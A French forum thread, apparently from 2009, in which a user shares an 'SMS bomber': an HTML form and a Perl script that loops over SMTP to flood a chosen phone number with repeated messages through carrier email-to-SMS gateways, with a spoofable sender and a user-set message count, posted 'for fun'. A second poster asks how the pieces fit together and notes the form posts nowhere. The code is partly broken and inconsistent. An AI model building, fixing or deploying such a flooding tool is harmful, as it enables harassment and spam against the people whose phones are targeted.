Vous n'êtes pas identifié.
Voila un sms bomber que j'ai coder il y'a des millinaire ^^
Amusez vous ^^
sms.php
<html>
<head>
<title>Sms Bomber 1.0 - CodeBreak5</title>
<style>
body {
background-color: #050505;
color: #00FF00;
font-size: 15px;
}
input {
background-color: #333333;
border: 1px Solid #ff0000;
color: #ffffff;
font-size: 18px;
}
</style>
</head>
<body>
<center>
<h4> SmS BoMber[V]1.0 By:CodeBreak5 </h4>
<hr>
<h4> /></h4>
<hr>
<h4> Lallalalalaalalala..., </h4>
<hr>
</center>
<form method="POST" action="">
Send From: <input type="text" name="s1" size="18">
<br>
Number: <input type="text" name="s2" size="18">
Select Service.
Cingular: <input type="checkbox" name="cingular" value="ON"></Center>
Nextel: <input type="checkbox" name="nextel" value="ON"></Center>
SprintPCS: <input type="checkbox" name="sprint" value="ON"></Center>
T-Mobile: <input type="checkbox" name="tmobile" value="ON"></Center>
Verizon: <input type="checkbox" name="verizon" value="ON"></Center>
Virgin Mobile: <input type="checkbox" name="virgin" value="ON"></Center>
<br>
Subject : <input type="text" name="s3" size="18">
<br>
Amount To Send : <input type="text" name="s5" size="18">
<br>
Enter a Message:
<br>
<textarea name="s4" cols="50" rows="5"></textarea>
<br >
<input type="submit" value="Send Bomb" name="sendbomb">
</form>
</body>
</html>
Désolé pour la longue réponse , voila l'autre partie ^^
sms.txt
#!/usr/bin/perl
#[c]oded by CodeBreak5
#CodeBreak5[at]SecureState.com
use Net::SMTP;
$host = @ARGV[0]; $num = @ARGV[1]; $lawlZ = @ARGV[2];
sub usage {
print"\n\n####################################
# SMS Bomber[V]1.0 #
# [c]oded by CodeBreak5 #
# #
# #
# #
# #
# #
# #
# #
# #
####################################\n\n";
}
if (@ARGV != 3){usage();exit();}
&header();
print "\n What do you want the message to say?\n\n";
$word = <STDIN>;
print "\n Sending text[s] to $host\n";
print "\n Please wait...\n\n";
for ($i = 0; $i < $lawlZ; ++$i){
@prov = ('@teleflip.com','@mobile.mycingular.com','@messaging.nextel.com','@messaging.sprintpcs.com','@tmomail.net','@vtext.com','@vmobl.com');
$teXt = Net::SMTP->new('pop.nassim.org')|| die print "Cannot connect to specified mail server\n\n";
$teXt->mail('nassim@aznag.com');
$teXt->to("$host$prov[$num]");
$teXt->data();
$teXt->datasend("\n$word\n\n");
$teXt->dataend();
$teXt->quit;}
print " Texted with $nassim messages\n\n";
Dernière modification par CodeBreak5 (15-07-2009 18:14:30)
Hors ligne
Voila tout est mis a jour.
Au plaisir,
CodeBreak5
Hors ligne
Mmmh
Je comprends pas tout dans dans ton code: (faut dire que je connais pas le perl aussi)
Pourquoi appelle tu ton deuxieme code sms.txt?
Ta balise <form method="POST" action=""> ne renvoie vers rien donc cela risque d'être un peu dure
Où se trouve le php?
$teXt->mail('nassim@aznag.com'); ==>on envoie un mail??
Faut'il un serveur spécial pour envoyer tes sms? Par quels ports passent-ils?
@prov = ('@teleflip.com','@mobile.mycingular.com','@messaging.nextel.com','@messaging.sprintpcs.com','@tmomail.net','@vtext.com','@vmobl.com'); => il ne manque pas qqchose?
Pas tout compris là?? :s
Merci pour tes explications ![]()
Hors ligne